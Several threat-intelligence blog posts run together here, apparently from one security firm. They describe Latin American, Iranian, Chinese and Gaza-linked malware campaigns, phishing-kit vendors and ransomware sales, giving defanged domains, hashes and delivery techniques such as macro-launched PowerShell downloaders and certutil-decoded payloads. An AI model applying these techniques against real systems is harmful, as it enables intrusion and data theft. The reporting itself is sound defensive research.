leetMX is a widespread cyber-attack campaign originating from Mexico and focused on targets in Mexico, El Salvador, and other countries in Latin America, such as Guatemala, Argentina and Costa Rica. It has been operating since November 2016 at least. We are uncertain of its objectives but estimate it is criminally motivated.
leetMX infrastructure includes 27 hosts and domains used for malware delivery or for command and control. Hundreds of malware samples have been used, most are Remote Access Trojans and keyloggers.
Interestingly, the attackers camouflage one of their delivery domains by redirecting visitors to El Universal, a major Mexican newspaper.
Below are samples of malicious Office documents delivered to targets. These documents contain macros that run PowerShell, which downloads and run various payloads from domains and hosts controlled by the attackers.
Ministerio de Hacienda El Salvador – Declaraciones Pendientes folio 34598.docm
Iranian Threat Agent Greenbug has been registering domains similar to those of Israeli High-Tech and Cyber Security Companies.
On 15 October 2017 a sample of ISMdoor was submitted to VirusTotal from Iraq. The sample name was WmiPrv.tmp (f5ef3b060fb476253f9a7638f82940d9) and it had the following PDB string:
Two domains were used for command and control:
Recently we detected new samples and Infrastructure of ISMAgent, a trojan in use by Iranian Threat Group GreenBug. Interestingly, as part of the delivery mechanism, the malware is disguised as a base64 digital certificate and decoded via certutil.exe. This post describes the new campaign.
Sample change managment.dot (812d3c4fddf9bb81d507397345a29bb0) exploits CVE-2017-0199 and calls the following URL:
The main aim of this research is to understand and describe the eco-systems of fake websites developers and designers, and the basic economy behind creation of fake websites that impersonate legitimate websites of banks, credit cards companies and corporations. Mostly, the aim of those fake websites is stealing credential (banking or corporate) or credit cards information.
As part of this research we checked dozens of popular Russian and English-speaking underground boards and forums, looking for vendors’ topics that provide services of fake webpages creation. On the second stage, when it was available, we conducted HUMINT operation and made a direct contact with those cybercrime vendors of fake sites via instant messaging (mostly jabber) to get deeper understanding of their skills, works and pricing.
Totally, we have checked about 15 different phishing vendors, when the main criteria were the skills of the vendor, the prices and how he makes the fake site.
We have checked a price for two main types of fake sites:
- Banking login page that is similar to real one – when the aim is to steal the login and the password to banking account.
- Second stage to the banking login page in order to steal additional information – page that do not exist in real bank website and asks the user to enter their credit cards number, expiration date and CVV number.
In addition, we have checked whether the vendors are just duplicating the original website, or developing it from scratch/partially.
Why does it matter? – Because mostly the duplicated websites are being exposed and taken down quicker, and as one vendors (Vendor9) told us – duplicated websites, in many cases are being blocked by Chrome/Safari:
Some of the vendors (like Vendor5), also add some kinds of filters to prolong the time of the fake website till it is being exposed:
We have seen that some of the vendors, mostly the more qualified ones are aware of those issues and mention it in the conversation, while the lower quality “developers”, or in other words the script kiddies who try to earn money don’t even understand what is the difference between just duplicate a website and develop a fake from scratch. To note, that some of the vendors, duplicate the website and make basic “cleaning” i.e. basic changes in HTML and content.
Below is a table that summarizes the key points of the research (to note that in the public version of this report we censored the nicknames of the vendors. This is done for the purpose of not promoting them):
We can see that there are two different types of professionals who are required to fake websites creation: the developers and the designers. Some of the fake websites service providers, who are developers, work with 3rd party designers when a design / change in the websites is required. We can see it from our conversation with one of the vendors named “Vendor2”:
From pricing point of view, the average price for banking login page is about 60$, when the pricing is mostly divided into two groups, those who just duplicate the original site mostly price it at about 20-30$ and those who develop the fake website from scratch price it at 50$ or more, when some of the vendors ask about 150-200$ for their work.
When we asked for pricing for additional page that not exist at real websites, for grabbing and stealing credit cards data, in some cases the price was significantly raised because this additional page required some development and design work, and not just duplicating existing page.
Some of the fake sites vendors, also develop different tools and panels that allow them to collect in a proper and comfortable way the stolen credentials and offering it for additional payment to fake websites buyers.
One of the additional services that some vendors offer is control panels that allow collecting all the required data and log in convenient manner.
One panel is introduced and beign sold by “Vendor3”:
Another one is built and developed by “Vendor5”:
Most of the vendors, work very hard to promote their services, constantly pump up their topics in different forums, and although the basic pricing of most of them is relatively low, in order to gain proper reputation, they offer various kinds of actions and discount.
For example, one of the young leading vendors of the last year, “Vendor1”, offered free creation of fake websites for TLD .de for limited time:
This quotation, as well as most of the quotations, and conversations with the vendors, was originally in Russian, and were translated, edited and redacted when it was necessary, while we tried to keep the essence of the chat and the language level as near to the original as it was possible.
In terms of time, there are vendors who are ready to conduct their work in timeframe of ten minutes or within an hour, but there are vendors who ask for several days.
Some of the vendors also publish colorful advertisements:
As they are acting as service providers, most of the vendors are very polity and patient to answer any questions that potential clients have (even too polite):
One of the vendors we had a conversation with, mentioned also some interesting points about creating good banking fakes:
In this research, we present in depth the vendors, their modus operandi and pricing and examples of their previously done works.
Read the full report: The Economy behind Phishing Websites Creation
For full, uncensored version of report – email firstname.lastname@example.org
CopyKittens is a cyberespionage group that has been operating since at least 2013. In November 2015, ClearSky and Minerva Labs published the first public report exposing its activity . In March 2017, ClearSky published a second report exposing further incidents, some of which impacted the German Bundestag .
In this report, Trend Micro and ClearSky expose a vast espionage apparatus spanning the entire time the group has been active. It includes recent incidents as well as older ones that have not been publicly reported; new malware; exploitation, delivery and command and control infrastructure; and the group’s modus operandi. We dubbed this activity Operation Wilted Tulip.
On July 17, 2017, we detected a malicious document in VirusTotal exploiting CVE-2017-0199. By pivoting off of the infrastructure we learned that it is related to Winnti, a Chinese threat actor that is mostly targeting the gaming industry. Below we outline initial findings.
The malicious file, named curriculum vitae.rtf (58c66b3ddbc0df9810119bb688ea8fb0) was uploaded from Turkey. Its content is presented below (we redacted personally identifiable information):
When the document is opened, it downloads and runs a file from the following URL:
Which contains a short VBS script:
The script downloads and runs an executable (a4b2a6883ba0451429df29506a1f6995) from the following URL:
Which uses backup.aolonline[.]cc as command and control server.
Indicators of compromise
Pivoting on IPs, code signing certificates, and domain registration details, we found further parts of the infrastructure, some got back to 2015. Most of them have been tagged as relating to “Casper aka LEAD” in a public PassiveTotal project by Cylance (However, we could not find a public report). Most sample were detected by Proofpoint as “ETPRO TROJAN Casper/LEAD DNS Lookup” (this signature was published in May 03, 2017).
The Maltego graph below depicts the relationship among the indicators (click to enlarge):
The indicators are available on PassiveTotal.
ClearSky conducts consistent monitoring of various Darknet actors and communities, including specific actors that develop and sell malware, exploits, bots and ransomware.
We have recently encountered very aggressive jabber spam campaign, advertising the “Philadelphia” ransomware.
As Brian Krebs wrote in one of his recent post, Philadelphia is a ransomware-as-a-service crime ware package that is sold for roughly $400 to would-be cyber criminals who dream of carving out their own ransomware empires. Philadelphia has many features, including the ability to generate PDF reports and charts of victims to track the campaigns, as well as the ability to plot victims around the world using Google Maps.
This is a screenshot of the jabber spam campaign:
In his post from March, Brian Krebs described the highly professional YouTube movie advertising this Ransomware.
This website advertises both the Philadelphia and Stampado Ransomware, but also advertises other services and tools that are provided by the same person:
Over the past few months ClearSky has been collaborating with Palo Alto Networks on preventing and detecting targeted attacks in the Middle East using two relatively new Microsoft Windows malware families which we call KASPERAGENT and MICROPSIA. In addition, our research has uncovered evidence of links between attacks using these two new malware families and two families of Google Android malware we are calling SECUREUPDATE and VAMP.
Read the full report at Targeted Attacks in the Middle East Using KASPERAGENT and MICROPSIA.
On 29 March 2017 the German Federal Office for Information Security (BSI) said in a statement that the website of Israeli newspaper Jerusalem Post was manipulated and linked to a harmful third party. Below is a Google translation of the statement:
“After the cyber attack on the German Bundestag in 2015, some protective functions that the BSI has established for government networks have also been adopted by the German Bundestag for its own networks. Since the beginning of January 2017, the BSI, as the national cyber security agency, has been in close contact with the German Bundestag, due to the network traffic of the German Bundestag. At the request of the German Bundestag the BSI analyzed these problems in network traffic. The technical analyzes have been completed. The website of the Jerusalem Post was manipulated and linked to a harmful third party. Within the framework of the analyzes, however, the BSI has not discovered any malicious software; infections are also not known to the BSI.”
As part of our monitoring of Iranian threat agents activities, we have detected that since October 2016 and until the end of January 2017, the Jerusalem Post, as well as multiple other Israeli websites and one website in the Palestinian Authority were compromised by Iranian threat agent CopyKittens. Based on the time-frame and nature of the compromises, we estimate with high certainty that the statement by German Federal Office for Information Security refers to the same incidents.
Attackers have been trying to breach IEC (Israel Electric Company) in a year-long campaign.
From April 2016 until at least February 2017, attackers have been spreading malware via fake Facebook profiles and pages, breached websites, self-hosted and cloud based websites. Various artifacts indicate that the main target of this campaign is IEC – Israel Electric Company. These include domains, file names, Java package names, and Facebook activity. We dubbed this campaign “Operation Electric Powder“.
Israel Electric Company (also known as Israel Electric Corporation) “is the largest supplier of electrical power in Israel. The IEC builds, maintains, and operates power generation stations, sub-stations, as well as transmission and distribution networks. The company is the sole integrated electric utility in the State of Israel. It installed generating capacity represents about 75% of the total electricity production capacity in the country.”
It is notable that the operational level and the technological sophistication of the attackers are not high. Also, they are having hard time preparing decoy documents and websites in Hebrew and English. Therefore, in most cases a vigilant target should be able to notice the attack and avoid infection. We do not have indication that the attacks succeeded in infecting IEC related computers or stealing information.
Currently we do not know who is behind Operation Electric Powder or what its objectives are. See further discussion in the Attribution section.
Impersonating Israeli news site
The attackers registered and used in multiple attacks the domain ynetnewes[.]com (note the extra e). This domain impersonates ynetnews.com, the English version of ynet.co.il – one of Israel’s most popular news sites.
Certain pages within the domain would load the legitimate Ynet website:
Others, which are opened as decoy during malware infection, had copied content from a different news site:
The URL ynetnewes[.]com/video/Newfilm.html contained an article about Brad Pitt and Marion Cotillard copied from another site. At the bottom was a link saying “Here For Watch It !”:
The link pointed to goo[.]gl/zxhJxu (Google’s URL shortening service). According to the statistics page, it had been created on September 25, 2016 and have been clicked only 11 times. When clicked, it would redirect to iecr[.]co/info/index_info.php .
We do not know what was the content in the final URL. We estimate that it served malware. The domain iecr[.]co was used as a command and control server for other malware in this campaign.
Another URL, http://ynetnewes[.]com/resources/assets/downloads/svchost.exe
hosted a malware file called program_stream_film_for_watch.exe.
Fake Facebook profile – Linda Santos
One of the above mentioned malicious URLs was spread via comments by a fake Facebook profile – Linda Santos (no longer available):
In September 2016, the fake profile commented to posts by Israel Electric Company:
The profile had dozens of friends, almost all were IEC employees:
The fake profile was following only three pages, one of which was the IEC official page:
Pokemon Go Facebook page
In July 2016, when mobile game “Pokemon Go” was at the peak of its popularity, the attackers created a Facebook page impersonating the official Pokemon Go page:
The page, which is no longer available, had about one hundred followers – most were Arab Israelis and some were Jewish Israelis.
Only one post was published, with text in English and Hebrew. Grammatical mistakes indicate the attackers are not native to both languages:
The post linked to a malicious website hosted in yolasite.com (which is a legitimate website building and hosting platform):
The button – “להורדה טלפון ומחשב” (literal translation – “To download phone and computer”) linked to a zip file in another website:
Note that the domain being impersonated is that of Israel Electric Company’s website (iec.co.il).
Android phone malware
The attackers also distributed a malicious app for Android devices – pokemon.apk (3137448e0cb7ad83c433a27b6dbfb090). This malware also had characteristics that impersonate IEC, such as the package name:
The application is a dropper that extracts and installs a spyware. The dropper does not ask for any permission during installation:
However, when the spyware is installed, it asks for multiple sensitive permissions:
The victim ends up with two applications installed on their device. The Dropper, pretending to be a Pokemon Go app, adds an icon to the phone dashboard. However, it does not have any functionality, and when clicked, this error message is displayed:
Sorry, this version is not compatible with your android version.
The dropper does not really check what android version is installed:
The message is intended to make the victim believe that the Pokemon game does not work because of compatibility issues.
The victim is likely to uninstall the application at this point. However, because a second application was installed, the phone would stay infected unless it is uninstalled as well.
Websites for Malware distribution
Malware was also hosted in legitimate breached Israeli websites, such as this educational website:
and a small law firm’s website:
In journey-in-israel[.]com, the attackers inserted an exploit code for CVE-2014-6332 – a Windows code execution vulnerability. The exploit was copied from an online source, likely from here, as the code included the same comments. The website also hosted this malware: afd5288d9aeb0c3ef7b37becb7ed4d5c.
In other cases, the attackers registered and built malicious websites: users-management[.]com and sourcefarge[.]net (similar to legitimate software website sourceforge.net). The latter was redirecting to journey-in-israel[.]com and iec-co-il[.]com in May and July 2016, according to PassiveTotal:
Sample 24befa319fd96dea587f82eb945f5d2a, potentially only a test file, is a self-extracting archive (SFX) that contains two files: a legitimate Putty installation and link.html:
When run, while putty is installed, the html file is opened in a browser and redirects to http://tinyurl[.]com/jerhz2a and then to http://users-management[.]com/info/index_info.php?id=9775. The last page 302 redirects to the website of an Israeli office supply company Mafil:
Sample f6d5b8d58079c5a008f7629bdd77ba7f , also a self-extracting archive, contained a decoy PDF document and a backdoor:
The PDF, named IEC.pdf, is a warranty document taken from Mafil’s public website. It is displayed to the victim while the malware (6aeb71d05a2f9b7c52ec06d65d838e82) is infecting its computer:
The attackers developed three malware types for Windows based computers:
- Dropper – self-extracting archives that extract and run the backdoor, sometimes while opening a decoy PDF document or website.
(For example: 6fa869f17b703a1282b8f386d0d87bd4)
- Trojan backdoor / downloader – malware that collects information about the system and can download and execute other files. (909125d1de7ac584c15f81a34262846f)
Some samples had two hardcoded command and control servers: iecrs[.]co and iecr[.]co (note once again the use of IEC in the domain name).
- Keylogger / screen grabber – records keystrokes and takes screenshots. The malware file is compiled Python code. (d3e0b129bad263e6c0dcb1a9da55978b)
An analysis of the malware and other parts of the campaign was published by Mcafee in on November 11, 2016.
The latest known sample in this campaign (7ceac3389a5c97a3008aae9a270c706a) has compilation timestamp of February 12, 2017. It is dropped when “pdf file products israel electric.exe” (c13c566b079258bf0782d9fb64612529) is executed.
In a report that covers other parts of the campaign, Mcafee attribute it to Gaza Cybergang (AKA Gaza Hacker Team AKA Molerats). However, the report does not present strong evidence to support this conclusion.
While initially we thought the same, currently we cannot relate Operation Electric Powder to any known group. Moreover, besides Mohamad potentially being the name of the malware developer (based on PDB string found in multiple samples: C:\Users\Mohammed.MU\Desktop\AM\programming\C\tsDownloader\Release\tsDownloader.pdb
), we do not have evidence that the attackers are Arabs.
Indicators of compromise
- Indicators file: Operation-Electric-Powder-indicators.csv (also available on PassiveTotal).
Notably, all but one of the IP addresses in use by the attackers belong to German IT services provider “Accelerated IT Services GmbH” (AS31400):
- Florian Roth shared a Yara rule to detect the downloader: Operation-Electric-Powder-yara.txt
- The graph below depicts the campaign infrastructure (click the image to see the full graph):
- Live samples can be downloaded from the following link:
(Please email email@example.com to get the password.)